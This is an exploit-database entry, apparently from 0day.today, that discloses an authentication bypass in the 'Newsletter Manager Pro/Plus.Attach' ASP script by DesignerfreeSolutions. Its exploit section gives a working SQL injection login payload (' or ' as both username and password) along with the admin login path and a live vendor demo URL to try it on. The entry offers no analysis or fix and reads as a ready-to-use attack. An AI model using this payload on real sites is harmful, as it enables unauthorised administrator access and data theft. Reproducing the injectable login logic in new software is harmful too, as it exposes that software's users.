id: 4890
date: 02/26/2009
title: DesignerfreeSolutions Newsletter Manager Pro Auth Bypass Vuln
author: ByALBAYX
cves: 

=============================================================
DesignerfreeSolutions Newsletter Manager Pro Auth Bypass Vuln
=============================================================


@~~=======================================~~@
@~~=Script   :Newsletter Manager Plus.Attach

@~~=S.Site   :http://designerfreesolutions.com

@~~=Dty      :http://designerfreesolutions.com/web/viewitem.asp?idproduct=1025

@~~=Demo     :http://designerfreesolutions.com/newsletterattach

@~~=Price    :47.00 USD
@~~=======================================~~@

@~~=Exploit:


@~~=Username: ' or '

@~~=Password: ' or '


@~~=http://c4team.org /Newsletter Manager /admin/index.asp


@~~=Demo:

@~~=http://www.designerfreesolutions.com/newsletterattach/admin/index.asp

vs..



#  0day.today [2023-03-24]  #